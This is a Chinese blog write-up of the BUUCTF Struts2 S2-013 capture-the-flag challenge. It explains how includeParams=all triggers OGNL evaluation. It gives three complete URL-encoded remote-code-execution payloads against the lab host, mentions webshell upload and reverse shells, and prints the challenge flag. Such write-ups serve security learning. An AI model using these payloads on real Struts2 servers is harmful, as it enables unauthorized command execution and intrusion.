BUUCTF-Real-[struts2]s2-013

最新推荐文章于 2024-07-12 15:53:09 发布
最新推荐文章于 2024-07-12 15:53:09 发布
阅读量432 收藏 6
点赞数 13
分类专栏: 漏洞复现与研究 文章标签: 网络安全 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rx3225968517/article/details/136017303
版权
本文探讨了Struts2中标签的includeParams属性如何导致跨站脚本(XSS)和远程代码执行(RCE)漏洞。通过示例payload,解释了如何利用这些属性执行任意命令并获取flag。
摘要由CSDN通过智能技术生成 

struts2的标签中 <s:a> 和 <s:url> 都有一个 includeParams 属性,可以设置成如下值

none - URL中不包含任何参数(默认)
get - 仅包含URL中的GET参数
all - 在URL中包含GET和POST参数
当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参数上。

此时<s:a> 或<s:url>尝试去解析原始请求参数时,会导致OGNL表达式的执行

在s2-013中,因为参数的问题导致rce漏洞的出现!

payload:

1、http://node5.buuoj.cn:27491/?a=%24%7B%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%27id%27).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%27dbapp%3D%27%2Bnew%20java.lang.String(%23d))%2C%23out.close()%7D

2、http://node5.buuoj.cn:27491/?redirect:%24%7b%23context%5b%22xwork.MethodAccessor.denyMethodExecution%22%5d%3dfalse%2c%23f%3d%23_memberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2c%23f.setAccessible(true)%2c%23f.set(%23_memberAccess%2ctrue)%2c%23a%3d%40java.lang.Runtime%40getRuntime().exec(%22echo+dqub23akjj21sd2kx75xa123f%22).getInputStream()%2c%23b%3dnew+java.io.InputStreamReader(%23a)%2c%23c%3dnew+java.io.BufferedReader(%23b)%2c%23d%3dnew+char%5b5000%5d%2c%23c.read(%23d)%2c%23genxor%3d%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2c%23genxor.println(%23d)%2c%23genxor.flush()%2c%23genxor.close()%7d

3、  Url: http://node5.buuoj.cn:27491/
      Vulnerable: True
      Method: POST
      Position: data
      Payload: redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27id%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}

一般使用第一个第二个即可!

这里的payload是经过url编码的!

在payload里面exec函数里面执行任意命令!可以上传木马!可以多姿势反弹shell! 

flag在环境变量里面,使用exec函数执行env命令即可!

flag{9a1b6b01-d8b0-4021-92b7-9e2a9049e8f9}

真的学不了一点。。。
关注
  • 13
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[struts2]s2-013 漏洞复现
satasun的博客
12-09 558
[struts2]s2-013 环境搭建 github buuctf poc Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=a
buuctf [struts2]s2-013
qq_1873822的博客
03-16 762
漏洞简介 Struts2 标签中 <s:a> 和 <s:url> 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: none - 链接不包含请求的任意参数值(默认) get - 链接只包含 GET 请求中的参数和其值 all - 链接包含 GET 和 POST 所有参数和其值 <s:a>用来显示一个超链接,当includeParams=all的时候,会将本次请求的GET和POST参数都放在URL的GET参.
struts2系列-Real-BUUCTF平台
~airrudder~
04-24 3758
本篇内容 [PHP]XXE [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce 上一篇 | 目录 | 下一篇 [PHP]XXE 打开就显示phpinfo,直接搜索flag就出来了。 不知道是不是环境坏了。 [ThinkPHP]5-Rce [ThinkPHP]5.0.23-Rce [ThinkPHP]2-Rce ...
CTF刷题-汇总
热门推荐
~airrudder~
04-09 1万+
BUUCTF平台的刷题之旅 Web
Apache Struts2远程代码执行漏洞(S2-013)复现
qq_36933272的博客
09-03 1731
查询原理:s:url和s:a标记都提供includeparams属性。 该属性的主要作用域是了解包含或不包含http://request参数的内容。 INCLUDEParams的允许值为: 无-在URL中不包含任何参数(默认) get-仅在URL中包含get参数 全部-在URL中同时包含get和post参数 包含精心设计的请求参数的请求可用于将任意ognl代码注入堆栈,随后用作URL或标记的请求参...
s2-013远程代码执行漏洞
Stephen Wolf
11-18 943
一、漏洞描述 struts2 标签中 `<s:a>` 和 `<s:url>` 都包含一个 includeParams 属性,其值可设置为 none,get 或 all,参考官方其对应意义如下: 1. none - 链接不包含请求的任意参数值(默认) 2. get - 链接只包含 GET 请求中的参数和其值 3. all - 链接包含 GET 和 POST 所有参数和其值...
S2-013 远程代码执行漏洞检测与利用
Fly_鹏程万里
12-16 2632
前言 S2-014是对于S2-013修复不完整的造成的漏洞,会在漏洞分析中提到,所以文本的主要分析的还是S2-013 而且在分析的时候,发现参考网上资料时对于漏洞触发逻辑的一些错误 至少目前我自己是那么认为的:) 漏洞环境根据vulhub修改而来,环境地址 https://github.com/kingkaki/Struts2-Vulenv,感兴趣的师傅可以一起分析下 若有疏漏,还望多多指...
real-fixed-cam
05-20
"real-fixed-cam"是这一技术中的一种特定模型,专门用于处理真实场景下固定摄像头拍摄的图像。在这个模型中,"real"意味着它在实际场景中进行了训练和测试,确保了对真实世界图像的良好适应性;"fixed-cam"则表明该...
Real-time Operating Systems Book 2 – The Practice
09-11
Unfortunately the practice may a bit more challenging, especially in the field of real-time operating systems. First, you need a sensible, practical toolset on which to carry out the work. Second, ...
tencent-real time stream recommendation
01-16
in most web applications, accurate real-time recommendation in the context of big data is of high demand. Traditional recommender systems that analyze data and update models at regular time intervals ...
"Sim-to-Real: Learning Agile Locomotion For Quadruped Robots"代码
02-09
本文将深入探讨"Sim-to-Real: Learning Agile Locomotion For Quadruped Robots"这一主题,主要基于提供的代码库sim2real_code,来阐述如何通过模拟训练实现四足机器人的敏捷行走。 一、四足机器人敏捷行走的挑战 ...
real-hand-held
05-20
在IT领域,尤其是在计算机视觉和图像处理方面,"real-hand-held"是一个重要的概念,它通常与数据集或模型训练有关。这个资源似乎是指一个特定的数据集,名为"real-hand-held",是Background-Matting系列的四个模型之...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8332
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
移动互联安全扩展要求测评项
hakksjss的博客
07-10 1019
应为无线接入设备的安装选择合理位置,避免过度覆盖和电磁干扰。无线接入设备的安装位置选择不当,易被攻击者利用,特别是攻击者会通过无线信号过度覆盖的弱点进行无线渗透攻击,因此要选择合理的位置安装无线接入设备。
车载视频监控管理方案:无人驾驶出租车安全出行的保障
最新发布
TSINGSEE青犀视频官方技术博客
07-12 347
为了确保数据的安全性和可靠性,本方案采用云存储技术,将车辆视频数据和相关信息存储在云端。
警钟!电池储能安全事故频发!物联网技术如何加强储能安全排查?
olzorange的博客
07-08 429
物联网技术的应用为储能安全排查提供了从源头预防到快速响应的全链条解决方案。
网络设备安全
weixin_48579910的博客
07-11 833
交换机作为网络核心设备,其安全性直接影响到整个网络的稳定和安全。通过实施身份验证和访问控制、设备配置安全、VLAN安全、ARP欺骗防护、MAC地址安全、DHCP欺骗防护、STP安全、拒绝服务防护以及固件和软件更新等措施,可以有效防范各种安全威胁。结合使用适当的安全工具和技术,组织可以大幅提高其交换机的安全防护能力,保护网络基础设施和数据的安全。定期进行安全审计和更新,确保交换机和网络始终处于最佳安全状态。确保路由器的安全是保护整个网络基础设施和数据传输安全的关键。
[终端安全]-5 移动终端之操作系统安全
wendywm0496的博客
07-08 1008
每个应用程序运行在一个独立的进程中,通过操作系统的内存管理单元(MMU)实现自己独立的虚拟地址空间,通常从0开始到某个最大值(例如,32位系统上为4GB),这个空间是进程私有的,MMU负责将虚拟地址转换为物理地址。当操作系统在不同进程之间切换时,会切换当前的页表,通过改变MMU中存储的页表基地址(通常存储在寄存器中)来实现,这样进程A和进程B即使使用相同的虚拟地址,也会映射到不同的物理地址。当用户启动应用A时,操作系统会为其创建一个新的进程,该进程由应用A的UID 10001运行;
O-RAN.WG3.RICARCH-v01.01.pdf
07-29
"O-RAN.WG3.RICARCH-v01.01.pdf" 是一份由O-RAN联盟发布的技术规范文档,专注于O-RAN(开放无线接入网)工作组3(WG3)的近实时无线网络智能控制器(Near-Real-time RAN Intelligent Controller,简称Near-RTRIC)的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值